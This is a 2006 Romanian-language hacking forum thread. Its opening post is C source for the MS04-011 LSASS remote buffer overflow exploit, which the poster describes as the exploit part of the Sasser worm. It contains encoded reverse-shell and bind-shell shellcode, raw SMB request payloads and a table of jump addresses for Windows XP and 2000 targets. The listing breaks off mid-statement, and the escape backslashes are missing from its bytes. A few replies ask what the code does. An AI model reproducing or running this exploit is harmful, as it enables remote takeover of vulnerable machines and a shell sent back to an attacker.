axxl2006 Posted July 23, 2006 Report Share Posted July 23, 2006 #include <stdio.h>#include <string.h>#include <netdb.h>#include <sys/types.h>#include <sys/socket.h>#include <netinet/in.h>#include <sys/types.h>#include <arpa/inet.h>// reverse shellcodeunsigned char reverseshell[] ="xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA""xEBx05xE8xEBxFFxFFxFF""x70x62x99x99x99xC6xFDx38xA9x99x99x99x12xD9x95x12""xE9x85x34x12xF1x91x12x6ExF3x9DxC0x71x02x99x99x99""x7Bx60xF1xAAxABx99x99xF1xEExEAxABxC6xCDx66x8Fx12""x71xF3x9DxC0x71x1Bx99x99x99x7Bx60x18x75x09x98x99""x99xCDxF1x98x98x99x99x66xCFx89xC9xC9xC9xC9xD9xC9""xD9xC9x66xCFx8Dx12x41xF1xE6x99x99x98xF1x9Bx99x9D""x4Bx12x55xF3x89xC8xCAx66xCFx81x1Cx59xECxD3xF1xFA""xF4xFDx99x10xFFxA9x1Ax75xCDx14xA5xBDxF3x8CxC0x32""x7Bx64x5FxDDxBDx89xDDx67xDDxBDxA4x10xC5xBDxD1x10""xC5xBDxD5x10xC5xBDxC9x14xDDxBDx89xCDxC9xC8xC8xC8""xF3x98xC8xC8x66xEFxA9xC8x66xCFx9Dx12x55xF3x66x66""xA8x66xCFx91xCAx66xCFx85x66xCFx95xC8xCFx12xDCxA5""x12xCDxB1xE1x9Ax4CxCBx12xEBxB9x9Ax6CxAAx50xD0xD8""x34x9Ax5CxAAx42x96x27x89xA3x4FxEDx91x58x52x94x9A""x43xD9x72x68xA2x86xECx7ExC3x12xC3xBDx9Ax44xFFx12""x95xD2x12xC3x85x9Ax44x12x9Dx12x9Ax5Cx32xC7xC0x5A""x71x99x66x66x66x17xD7x97x75xEBx67x2Ax8Fx34x40x9C""x57x76x57x79xF9x52x74x65xA2x40x90x6Cx34x75x60x33""xF9x7ExE0x5FxE0";// bind shellcodeunsigned char bindshell[] ="xEBx10x5Ax4Ax33xC9x66xB9x7Dx01x80x34x0Ax99xE2xFA""xEBx05xE8xEBxFFxFFxFF""x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12""xE9x85x34x12xD9x91x12x41x12xEAxA5x12xEDx87xE1x9A""x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8x12xA6""x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D""xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A""x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58""x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0""x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41""xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B""x66xCEx75x12x41x5Ex9Ex9Bx99x9Dx4BxAAx59x10xDEx9D""xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA""x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0x10""x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF""xB5x98x98x14xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8""xC8x5ExDExA5xFAxF4xFDx99x14xDExA5xC9xC8x66xCEx79""xCBx66xCEx65xCAx66xCEx65xC9x66xCEx7DxAAx59x35x1C""x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59""x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD""xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC""xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5""xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6""xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8x99xFBxF0""xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED""x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99";char req1[] ="x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE""x00x00x00x00x00x62x00x02x50x43x20x4Ex45x54x57x4F""x52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02""x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6F""x77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70""x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30""x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54""x20x4Cx4Dx20x30x2Ex31x32x00";char req2[] ="x00x00x00xA4xFFx53x4Dx42x73x00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE""x00x00x10x00x0CxFFx00xA4x00x04x11x0Ax00x00x00x00""x00x00x00x20x00x00x00x00x00xD4x00x00x80x69x00x4E""x54x4Cx4Dx53x53x50x00x01x00x00x00x97x82x08xE0x00""x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00""x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00""x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00""x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00""x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00""x2Ex00x30x00x00x00x00x00";char req3[] ="x00x00x00xDAxFFx53x4Dx42x73x00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE""x00x08x20x00x0CxFFx00xDAx00x04x11x0Ax00x00x00x00""x00x00x00x57x00x00x00x00x00xD4x00x00x80x9Fx00x4E""x54x4Cx4Dx53x53x50x00x03x00x00x00x01x00x01x00x46""x00x00x00x00x00x00x00x47x00x00x00x00x00x00x00x40""x00x00x00x00x00x00x00x40x00x00x00x06x00x06x00x40""x00x00x00x10x00x10x00x47x00x00x00x15x8Ax88xE0x48""x00x4Fx00x44x00x00x81x19x6Ax7AxF2xE4x49x1Cx28xAF""x30x25x74x10x67x53x57x00x69x00x6Ex00x64x00x6Fx00""x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00""x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00""x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00""x30x00x20x00x35x00x2Ex00x30x00x00x00x00x00";char req4[] ="x00x00x00x5CxFFx53x4Dx42x75x00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE""x00x08x30x00x04xFFx00x5Cx00x08x00x01x00x31x00x00""x5Cx00x5Cx00x31x00x39x00x32x00x2Ex00x31x00x36x00""x38x00x2Ex00x31x00x2Ex00x32x00x31x00x30x00x5Cx00""x49x00x50x00x43x00x24""x00x00x00x3Fx3Fx3Fx3Fx3Fx00";char req5[] ="x00x00x00x64xFFx53x4Dx42xA2x00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04""x00x08x40x00x18xFFx00xDExDEx00x0Ex00x16x00x00x00""x00x00x00x00x9Fx01x02x00x00x00x00x00x00x00x00x00""x00x00x00x00x03x00x00x00x01x00x00x00x40x00x00x00""x02x00x00x00x03x11x00x00x5Cx00x6Cx00x73x00x61x00""x72x00x70x00x63x00x00x00";char req6[] ="x00x00x00x9CxFFx53x4Dx42x25x00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04""x00x08x50x00x10x00x00x48x00x00x00x00x04x00x00x00""x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02""x00x26x00x00x40x59x00x10x5Cx00x50x00x49x00x50x00""x45x00x5Cx00x00x00x00x00x05x00x0Bx03x10x00x00x00""x48x00x00x00x01x00x00x00xB8x10xB8x10x00x00x00x00""x01x00x00x00x00x00x01x00x6Ax28x19x39x0CxB1xD0x11""x9BxA8x00xC0x4FxD9x2ExF5x00x00x00x00x04x5Dx88x8A""xEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00";char req7[] ="x00x00x0CxF4xFFx53x4Dx42x25x00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04""x00x08x60x00x10x00x00xA0x0Cx00x00x00x04x00x00x00""x00x00x00x00x00x00x00x00x00x54x00xA0x0Cx54x00x02""x00x26x00x00x40xB1x0Cx10x5Cx00x50x00x49x00x50x00""x45x00x5Cx00x00x00x00x00x05x00x00x03x10x00x00x00""xA0x0Cx00x00x01x00x00x00x88x0Cx00x00x00x00x09x00""xECx03x00x00x00x00x00x00xECx03x00x00";// room for shellcode here ...char shit1[] ="x95x14x40x00x03x00x00x00x7Cx70x40x00x01x00x00x00""x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00""x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00""x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00""x00x00x00x00x01x00x00x00x00x00x00x00x7Cx70x40x00""x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00""x7Cx70x40x00x01x00x00x00x00x00x00x00x01x00x00x00""x00x00x00x00x7Cx70x40x00x01x00x00x00x00x00x00x00""x01x00x00x00x00x00x00x00x78x85x13x00xABx5BxA6xE9";char req8[] ="x00x00x10xF8xFFx53x4Dx42x2Fx00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFE""x00x08x60x00x0ExFFx00xDExDEx00x40x00x00x00x00xFF""xFFxFFxFFx08x00xB8x10x00x00xB8x10x40x00x00x00x00""x00xB9x10xEEx05x00x00x01x10x00x00x00xB8x10x00x00""x01x00x00x00x0Cx20x00x00x00x00x09x00xADx0Dx00x00""x00x00x00x00xADx0Dx00x00";// room for shellcode here ...char req9[] ="x00x00x0FxD8xFFx53x4Dx42x25x00x00x00x00x18x07xC8""x00x00x00x00x00x00x00x00x00x00x00x00x00x08x18x01""x00x08x70x00x10x00x00x84x0Fx00x00x00x04x00x00x00""x00x00x00x00x00x00x00x00x00x54x00x84x0Fx54x00x02""x00x26x00x00x40x95x0Fx00x5Cx00x50x00x49x00x50x00""x45x00x5Cx00x00x00x00x00x05x00x00x02x10x00x00x00""x84x0Fx00x00x01x00x00x00x6Cx0Fx00x00x00x00x09x00";char shit3[] ="x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00""x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00""x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00""x01x00x00x00""x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00""x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00""x01x00x00x00x00x00x00x00x9AxA8x40x00x01x00x00x00""x00x00x00x00x01x00x00x00x00x00x00x00x9AxA8x40x00""x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00";#define LEN 3500#define BUFSIZE 2000#define NOP 0x90struct targets {int num;char name[50];long jmpaddr;} ttarget[]= {{ 0, "WinXP Professional   [universal] lsass.exe ", 0x01004600 }, // jmp esp addr{ 1, "Win2k Professional   [universal] netrap.dll", 0x7515123c }, // jmp ebx addr{ 2, "Win2k Advanced Server [sP4]    netrap.dll", 0x751c123c }, // jmp ebx addr};void usage(char *prog){int i;printf("Usage:nn");printf("%s <target> <victim IP> <bindport> [connectback IP] [options]nn", prog);printf("Targets:n");for (i=0; i<3; i++)printf(" %d [0x%.8x]: %sn", ttarget[i].num, ttarget[i].jmpaddr, ttarget[i].name);printf("nOptions:n");printf(" -t: Detect remote OS:n");printf(" Windows 5.1 - WinXPn");printf(" Windows 5.0 - Win2knn");exit(0);}int main(int argc, char *argv[]){int i;int opt = 0;char *target;char hostipc[40];char hostipc2[40*2];unsigned short port;unsigned long ip;unsigned char *sc;char buf[LEN+1];char sendbuf[(LEN+1)*2];char req4u[sizeof(req4)+20];char screq[bUFSIZE+sizeof(req7)+1500+440];char screq2k[4348+4060];char screq2k2[4348+4060];char recvbuf[1600];char strasm[]="x66x81xECx1Cx07xFFxE4";char strBuffer[bUFSIZE];unsigned int targetnum = 0;int len, sockfd;short dport = 445;struct hostent *he;struct sockaddr_in their_addr;char smblen;char unclen;printf("nMS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1n");printf("--- Coded by .::[ houseofdabus ]::. ---nn");if (argc < 4) {usage(argv[0]);}target = argv[2];sprintf((char *)hostipc,"%sipc$", target);for (i=0; i<40; i++) {hostipc2[i*2] = hostipc[i];hostipc2[i*2+1] = 0;}memcpy(req4u, req4, sizeof(req4)-1);memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9);smblen = 52+(char)strlen(hostipc)*2;memcpy(req4u+3, &smblen, 1);unclen = 9 + (char)strlen(hostipc)*2;memcpy(req4u+45, &unclen, 1);if (argc > 4)if (!memcmp(argv[4], "-t", 2)) opt = 1;if ( (argc > 4) && !opt ) {port = htons(atoi(argv[3]))^(unsigned short int)0x9999;ip = inet_addr(argv[4])^(unsigned long int)0x99999999;memcpy(&reverseshell[118], &port, 2);memcpy(&reverseshell[111], &ip, 4);sc = reverseshell;} else {port = htons(atoi(argv[3]))^(unsigned short int)0x9999;memcpy(&bindshell[176], &port, 2);sc = bindshell;}if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) {memset(buf, NOP, LEN);//memcpy(&buf[2020], "x3cx12x15x75", 4);memcpy(&buf[2020], &ttarget[atoi(argv[1])].jmpaddr, 4);memcpy(&buf[2036], sc, strlen(sc));memcpy(&buf[2840], "xebx06xebx06", 4);memcpy(&buf[2844], &ttarget[atoi(argv[1])].jmpaddr, 4); // jmp ebx addr//memcpy(&buf[2844], "x3cx12x15x75", 4); // jmp ebx addrmemcpy(&buf[2856], sc, strlen(sc));for (i=0; i<LEN; i++) {sendbuf[i*2] = buf[i];sendbuf[i*2+1] = 0;}sendbuf[LEN*2]=0;sendbuf[LEN*2+1]=0;memset(screq2k, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);memset(screq2k2, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);} else {memset(strBuffer, NOP, BUFSIZE);memcpy(strBuffer+160, sc, strlen(sc));memcpy(strBuffer+1980, strasm, strlen(strasm));*(long *)&strBuffer[1964]=ttarget[atoi(argv[1])].jmpaddr;}memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500);if ((he=gethostbyname(argv[2])) == NULL) { // get the host infoperror("[-] gethostbyname ");exit(1);}if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {perror("socket");exit(1);}their_addr.sin_family = AF_INET;their_addr.sin_port = htons(dport);their_addr.sin_addr = *((struct in_addr *)he->h_addr);memset(&(their_addr.sin_zero), ' Quote Link to comment Share on other sites More sharing options...
ecstazy_kid Posted July 23, 2006 Report Share Posted July 23, 2006 1. Facut in C++2. ceva detali mai poti da , daca se paote ex: la ce foloseste mai exact Quote Link to comment Share on other sites More sharing options...
virusz Posted July 23, 2006 Report Share Posted July 23, 2006 dupa prima vedere,(nu m-am uitat mai exact) nu este sursa virusului saser. e numai exploitul prin care acest worm intra..... repet nu sunt sigur, mai bine ne spune cel care a postat ... Quote Link to comment Share on other sites More sharing options...
!_30 Posted July 23, 2006 Report Share Posted July 23, 2006 sau doar a facut rost de un astfel de worm , i-a luat codul sursa si ni l-a dat copy-paste , pentr a-l putea modifca dupa propiul plac , si apoi , complicam , si sa generam executabilul ?Daca nu e asa cred ca ar fi trebuit ca titlul sau macar descrierea ostului sa curpinda si o mica explicatie , ce este si ce face ?! Quote Link to comment Share on other sites More sharing options...
axxl2006 Posted July 23, 2006 Author Report Share Posted July 23, 2006 este doar o parte din codul sursa a worm-ului Sasser. Dupa cum va puteti da seama este doar partea prin care exploateaza vulnerabilitatea lsass. lipsesc codurile sursa pt serverul ftp, instalarea lui si cheile din registry, copierea lui pe pc-ul victimei, generarea unui ip random si exploatarea lui...si altele, depinde de versiune. Quote Link to comment Share on other sites More sharing options...